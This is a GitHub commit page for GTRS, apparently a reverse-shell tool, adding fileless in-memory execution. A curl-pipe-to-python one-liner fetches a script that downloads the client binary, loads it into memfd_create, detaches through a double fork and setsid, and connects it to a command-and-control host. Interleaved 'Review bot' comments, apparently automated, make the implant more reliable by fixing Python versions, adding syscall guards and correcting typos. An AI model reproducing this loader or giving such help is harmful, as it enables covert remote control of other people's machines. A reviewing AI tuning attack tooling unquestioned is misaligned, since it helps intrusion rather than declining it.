In memory execution
mthbernardes committed Dec 25, 2018
1 parent 36bc380 commit 3718503
Showing 2 changed files with 35 additions and 2 deletions.
11 changes: 9 additions & 2 deletions README.md
@@ -26,11 +26,18 @@ bash client.sh www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062
Now you have an interactive shell using named pipe files, **YES** you can `cd` into directories.

# Client Go
You first need to download the binarie or compile it, then the processe is equal of the bash client,
You first need to [download](https://github.com/mthbernardes/GTRS/releases) the binary or compile it, then the process is equal of the bash client,
```bash
./client_Linux www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062
```
With this client you have the hability to run it on Linux, Mac and Windows, but the client do not have a interactive shell yet.
With this client you have the ability to run it on Linux, Mac and Windows, but the client do not have a interactive shell yet.

# ELF in-memory execution (Linux Only)
After reading this [blogpost](https://blog.fbkcs.ru/en/elf-in-memory-execution/), I made a simple adaption to execute the GTRS in memory, just edit the host and key in the script [inmemory-linux.py](utils/inmemory-linux.py), then host it on a server an curl it.
```bash
curl https://yourserver.ml/inmemory-linux.py | python
```
Or you can host the script using the [youtube](https://mthbernardes.github.io/rce/2018/12/14/hosting-malicious-payloads-on-youtube.html) approach.

# Poc
[![CODE_IS_CHEAP_SHOW_ME_THE_DEMO](http://img.youtube.com/vi/02CFsE0k96E/0.jpg)](http://www.youtube.com/watch?v=02CFsE0k96E)
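Review bot: the one-liner in the new "ELF in-memory execution" section, `curl https://yourserver.ml/inmemory-linux.py | python`, needs to name the interpreter version, because the script it points to (utils/inmemory-linux.py, added in this same commit) calls `urllib.urlopen`, which exists only in Python 2; on a host where `python` resolves to Python 3 the pipe fails with an AttributeError before anything runs. Write it as `| python2` and state the requirements next to it (Python 2, Linux, a kernel with memfd_create, i.e. 3.17 or newer). The same paragraph has "host it on a server an curl it", which should be "and curl it", and the sentence above the section, "the client do not have a interactive shell yet", should read "the client does not have an interactive shell yet". Since the script goes on to download and execute an ELF from GitHub releases, the section should also tell the operator to check the downloaded binary against a hash recorded at build or download time, or to host a pinned copy, rather than executing whatever the URL serves.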
26 changes: 26 additions & 0 deletions utils/inmemory-linux.py
@@ -0,0 +1,26 @@
#!/usr/bin/python

# This code came from this awesome blogpost, https://blog.fbkcs.ru/en/elf-in-memory-execution/

import os
import urllib
import ctypes

url = "https://github.com/mthbernardes/GTRS/releases/download/v1/client_Linux"
binary = urllib.urlopen(url).read()

fd = ctypes.CDLL(None).syscall(319,"",1)
final_fd = open('/proc/self/fd/'+str(fd),'wb')
final_fd.write(binary)
final_fd.close()

fork1 = os.fork()
if 0 != fork1: os._exit(0)

ctypes.CDLL(None).syscall(112)

fork2 = os.fork()
if 0 != fork2: os._exit(0)

os.execl('/proc/self/fd/'+str(fd),'echo','youserver.ml','yourtokengoeshere')

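Review bot: the two raw syscall numbers, 319 (memfd_create) and 112 (setsid), are the x86_64 values, and the script never checks what `syscall()` returns, so on another architecture or on a kernel older than 3.17 (no memfd_create) `fd` is -1 and the script dies at `open('/proc/self/fd/-1', 'wb')` with a misleading "No such file or directory" instead of saying why. Add a guard right after the call, e.g.

fd = ctypes.CDLL(None).syscall(319, "", 1)
if fd < 0: raise SystemExit("memfd_create failed: not x86_64, or kernel older than 3.17")

and either document the x86_64-only assumption in the header comment or replace the second call with `os.setsid()`, which is in the standard library and removes one magic number. Two smaller points: the module is Python 2 only (`urllib.urlopen`, and on Python 3 the `""` name argument would be passed to the syscall as a wide-char pointer), so the shebang should be `#!/usr/bin/python2` or the README should say so; and `binary` is written to the memfd and executed with no integrity check, so compare its SHA-256 against a hash recorded when the release was built or first downloaded before writing it. The argv placeholder `'youserver.ml'` also looks like a typo for `yourserver.ml`, which is the name the README uses.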
0 comments on commit 3718503